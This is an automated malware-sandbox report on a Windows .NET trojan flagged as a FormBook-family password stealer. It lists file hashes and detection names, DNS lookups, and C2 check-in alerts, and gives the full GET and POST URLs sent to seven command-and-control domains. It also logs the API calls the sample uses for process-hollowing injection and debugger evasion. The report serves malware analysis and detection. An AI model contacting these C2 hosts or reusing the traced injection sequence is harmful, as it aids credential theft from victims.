Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 25, 2021, 10:55 a.m.	Sept. 25, 2021, 11:15 a.m.

Size	421.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`859a1a6574e4a09027f729908318b282`
SHA256	`d84f2a05198d85dd6f2bf606fe6e24f7ca929cff9796d6b7f269bb8e7cf8b2a7`
CRC32	`A6380E5A`
ssdeep	`6144:8qg7fGHfcOKsSjA1pUVUrmOGH5ieTmHnTCyp93MyNNdHaR2TjIPN9KPZt2HS:6GEOME1pUVUih8986xK2XU`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) IsPE32 - (no description) Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult

vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
3024
- vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
  2540

Name	Response	Post-Analysis Lookup
www.sakibotchi.com	A 210.157.78.20	210.157.78.20
www.ricartepinlac.com	CNAME ghs.google.com A 142.250.207.83	142.250.196.115
www.realisa.net
www.azur-riviera-rental.com	A 213.186.33.5	213.186.33.5
www.jessicapets.com	A 192.185.41.209 CNAME jessicapets.com	192.185.41.209
www.bluewinetours.com	CNAME HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com A 3.223.115.185	3.223.115.185
www.sapphiretype.com	A 44.227.76.166 A 44.227.65.245	44.227.76.166
www.bellapbd.com	A 104.167.94.189 CNAME bellapbd.com	104.167.94.189
www.rapi-vet.com

IP Address	Status	Action
104.167.94.189	Active	Moloch
142.250.207.83	Active	Moloch
164.124.101.2	Active	Moloch
192.185.41.209	Active	Moloch
210.157.78.20	Active	Moloch
213.186.33.5	Active	Moloch
3.223.115.185	Active	Moloch
44.227.65.245	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49209 -> 192.185.41.209:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 192.185.41.209:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 192.185.41.209:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 142.250.207.83:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 142.250.207.83:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 142.250.207.83:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 210.157.78.20:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 210.157.78.20:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 210.157.78.20:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 44.227.65.245:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 44.227.65.245:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 44.227.65.245:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49215 -> 3.223.115.185:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49215 -> 3.223.115.185:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49215 -> 3.223.115.185:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49217 -> 213.186.33.5:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49217 -> 213.186.33.5:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49217 -> 213.186.33.5:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 104.167.94.189:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 104.167.94.189:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 104.167.94.189:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 25, 2021, 10:55 a.m.			0	0
IsDebuggerPresent Sept. 25, 2021, 10:55 a.m.			0	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 25, 2021, 10:55 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (7 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.bellapbd.com/arup/?ETYPCTH=DygWLLaHBMdL0xzXIIQDErATpFpfyLcRT4pInNWXfILAsokXZHc++OLWwcWCbG/tRp8OifRZ&VRfXC=00GP1JE0pzJtH07P
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.ricartepinlac.com/arup/?ETYPCTH=XnzrGMJk6ywKx2jxse7wkW30YFqeVvQMXDYRS0h6WphrBN8VI8iOdrfcgrYbWs/qH4zEhANK&VRfXC=00GP1JE0pzJtH07P
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.jessicapets.com/arup/?ETYPCTH=EgNVIK57ZkGVVx/jttXBp19FXWTnr3BxO3OM0vEVfVnn3mprZmBwTpm4RYNxhQMHEbJUH8Io&VRfXC=00GP1JE0pzJtH07P
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.sakibotchi.com/arup/?ETYPCTH=Mvc3fTWMfEUu/hJGRB8Vpo7AngyGJqukIsCEA36EgUZmxx/V3r5r40WhFcDOzFRheeQperkl&VRfXC=00GP1JE0pzJtH07P
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.sapphiretype.com/arup/?ETYPCTH=9WQg9dHIcuW4YkfTt4Mg6pnO/WJ56x4wIeILmi0slk+dZh2MACvfyqaF7lvzeXfvJhlREdkQ&VRfXC=00GP1JE0pzJtH07P
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.bluewinetours.com/arup/?ETYPCTH=7PqJqCZghG+ypoVFP7RJavJcukSULZ9xovwwwTa882pBqoNTfIjDpcv/7FzdkuK9miXhvjt/&VRfXC=00GP1JE0pzJtH07P
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.azur-riviera-rental.com/arup/?ETYPCTH=5U1783QtuC0Bz0i23JIEbkPIiJHKV9ss1Vjx/owP5dSKhTyiL/UYC4drrg67ooFL+sZSTQRi&VRfXC=00GP1JE0pzJtH07P

Performs some HTTP requests (14 events)

request	POST http://www.bellapbd.com/arup/
request	GET http://www.bellapbd.com/arup/?ETYPCTH=DygWLLaHBMdL0xzXIIQDErATpFpfyLcRT4pInNWXfILAsokXZHc++OLWwcWCbG/tRp8OifRZ&VRfXC=00GP1JE0pzJtH07P
request	POST http://www.ricartepinlac.com/arup/
request	GET http://www.ricartepinlac.com/arup/?ETYPCTH=XnzrGMJk6ywKx2jxse7wkW30YFqeVvQMXDYRS0h6WphrBN8VI8iOdrfcgrYbWs/qH4zEhANK&VRfXC=00GP1JE0pzJtH07P
request	POST http://www.jessicapets.com/arup/
request	GET http://www.jessicapets.com/arup/?ETYPCTH=EgNVIK57ZkGVVx/jttXBp19FXWTnr3BxO3OM0vEVfVnn3mprZmBwTpm4RYNxhQMHEbJUH8Io&VRfXC=00GP1JE0pzJtH07P
request	POST http://www.sakibotchi.com/arup/
request	GET http://www.sakibotchi.com/arup/?ETYPCTH=Mvc3fTWMfEUu/hJGRB8Vpo7AngyGJqukIsCEA36EgUZmxx/V3r5r40WhFcDOzFRheeQperkl&VRfXC=00GP1JE0pzJtH07P
request	POST http://www.sapphiretype.com/arup/
request	GET http://www.sapphiretype.com/arup/?ETYPCTH=9WQg9dHIcuW4YkfTt4Mg6pnO/WJ56x4wIeILmi0slk+dZh2MACvfyqaF7lvzeXfvJhlREdkQ&VRfXC=00GP1JE0pzJtH07P
request	POST http://www.bluewinetours.com/arup/
request	GET http://www.bluewinetours.com/arup/?ETYPCTH=7PqJqCZghG+ypoVFP7RJavJcukSULZ9xovwwwTa882pBqoNTfIjDpcv/7FzdkuK9miXhvjt/&VRfXC=00GP1JE0pzJtH07P
request	POST http://www.azur-riviera-rental.com/arup/
request	GET http://www.azur-riviera-rental.com/arup/?ETYPCTH=5U1783QtuC0Bz0i23JIEbkPIiJHKV9ss1Vjx/owP5dSKhTyiL/UYC4drrg67ooFL+sZSTQRi&VRfXC=00GP1JE0pzJtH07P

Sends data using the HTTP POST Method (7 events)

request	POST http://www.bellapbd.com/arup/
request	POST http://www.ricartepinlac.com/arup/
request	POST http://www.jessicapets.com/arup/
request	POST http://www.sakibotchi.com/arup/
request	POST http://www.sapphiretype.com/arup/
request	POST http://www.bluewinetours.com/arup/
request	POST http://www.azur-riviera-rental.com/arup/

Allocates read-write-execute memory (usually to unpack itself) (30 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00890000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72741000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72742000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02460000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02630000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00312000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00345000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0034b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00347000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0032c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0031a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0033a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00337000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0032a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71fb2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00336000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00701000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0032d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00702000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00703000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00709000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0070a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0070f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a73000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2021, 11:13 a.m.	process_identifier: 2540 region_size: 3158016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a60000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00068c00', u'virtual_address': u'0x00002000', u'entropy': 7.8352896051409555, u'name': u'.text', u'virtual_size': u'0x00068ad4'}

entropy

7.83528960514

description

A section with a high entropy has been found

entropy

0.995249406176

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 25, 2021, 10:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Sept. 25, 2021, 11:13 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Sept. 25, 2021, 10:55 a.m.	status_code: 0xffffffff process_identifier: 1760 process_handle: 0x00000268		0	0
NtTerminateProcess Sept. 25, 2021, 10:55 a.m.	status_code: 0xffffffff process_identifier: 1760 process_handle: 0x00000268	1	0	0

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 1760 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000234		3221225496	0
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 2540 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000026c	1	0	0

Manipulates memory of a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3024 manipulating memory of non-child process 1760
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 1760 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000234		3221225496	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 25, 2021, 10:55 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPELqbLà \|°Ô@@.textÌ{\| ` base_address: 0x00400000 process_identifier: 2540 process_handle: 0x0000026c	1	1	0
WriteProcessMemory Sept. 25, 2021, 10:55 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2540 process_handle: 0x0000026c	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 25, 2021, 10:55 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPELqbLà \|°Ô@@.textÌ{\| ` base_address: 0x00400000 process_identifier: 2540 process_handle: 0x0000026c	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3024 called NtSetContextThread to modify thread in remote process 2540
NtSetContextThread Sept. 25, 2021, 10:55 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4314288 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000268 process_identifier: 2540	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3024 resumed a thread in remote process 2540
NtResumeThread Sept. 25, 2021, 10:55 a.m.	thread_handle: 0x00000268 suspend_count: 1 process_identifier: 2540	1	0	0

Executed a process and injected code into it, probably while unpacking (14 events)

Time & API	Arguments	Status	Return
NtResumeThread Sept. 25, 2021, 10:55 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 3024	1	0
NtResumeThread Sept. 25, 2021, 10:55 a.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 3024	1	0
NtResumeThread Sept. 25, 2021, 10:55 a.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 3024	1	0
CreateProcessInternalW Sept. 25, 2021, 10:55 a.m.	thread_identifier: 1296 thread_handle: 0x00000224 process_identifier: 1760 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\vbc.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\vbc.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000234	1	1
NtGetContextThread Sept. 25, 2021, 10:55 a.m.	thread_handle: 0x00000224	1	0
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 1760 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000234		3221225496
CreateProcessInternalW Sept. 25, 2021, 10:55 a.m.	thread_identifier: 1828 thread_handle: 0x00000268 process_identifier: 2540 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\vbc.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\vbc.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000026c	1	1
NtGetContextThread Sept. 25, 2021, 10:55 a.m.	thread_handle: 0x00000268	1	0
NtAllocateVirtualMemory Sept. 25, 2021, 10:55 a.m.	process_identifier: 2540 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000026c	1	0
WriteProcessMemory Sept. 25, 2021, 10:55 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPELqbLà \|°Ô@@.textÌ{\| ` base_address: 0x00400000 process_identifier: 2540 process_handle: 0x0000026c	1	1
WriteProcessMemory Sept. 25, 2021, 10:55 a.m.	buffer: base_address: 0x00401000 process_identifier: 2540 process_handle: 0x0000026c	1	1
WriteProcessMemory Sept. 25, 2021, 10:55 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2540 process_handle: 0x0000026c	1	1
NtSetContextThread Sept. 25, 2021, 10:55 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4314288 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000268 process_identifier: 2540	1	0
NtResumeThread Sept. 25, 2021, 10:55 a.m.	thread_handle: 0x00000268 suspend_count: 1 process_identifier: 2540	1	0

File has been identified by 38 AntiVirus engines on VirusTotal as malicious (38 events)

Lionic	Trojan.MSIL.Taskun.4!c
Elastic	malicious (high confidence)
DrWeb	Trojan.PWS.Siggen3.3163
MicroWorld-eScan	Trojan.GenericKD.37644489
FireEye	Generic.mg.859a1a6574e4a090
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
Alibaba	Trojan:Win32/runner.ali1000123
Cybereason	malicious.6ca263
Cyren	W32/MSIL_Kryptik.BHF.gen!Eldorado
ESET-NOD32	a variant of MSIL/Kryptik.ACXJ
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Trojan-Spy.MSIL.Noon.gen
BitDefender	Trojan.GenericKD.37644489
Avast	Win32:PWSX-gen [Trj]
Tencent	Msil.Trojan-spy.Noon.Eaxe
Ad-Aware	Trojan.GenericKD.37644489
Emsisoft	Trojan.GenericKD.37644489 (B)
McAfee-GW-Edition	BehavesLike.Win32.Generic.gc
Sophos	Mal/Generic-S
Ikarus	Trojan.MSIL.Crypt
Kingsoft	Win32.Troj.Generic_a.a.(kcloud)
Gridinsoft	Trojan.Win32.Kryptik.oa
Microsoft	Trojan:Win32/AgentTesla!ml
ZoneAlarm	HEUR:Trojan-Spy.MSIL.Noon.gen
GData	Win32.Trojan-Stealer.FormBook.R10TTY
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.PWSX-gen.C4646859
McAfee	RDN/Generic
MAX	malware (ai score=99)
Malwarebytes	Trojan.MalPack.PNG.Generic
TrendMicro-HouseCall	TROJ_FRS.VSNTIO21
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/GenKryptik.FLCK!tr
AVG	Win32:PWSX-gen [Trj]
CrowdStrike	win/malicious_confidence_100% (W)

vbc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All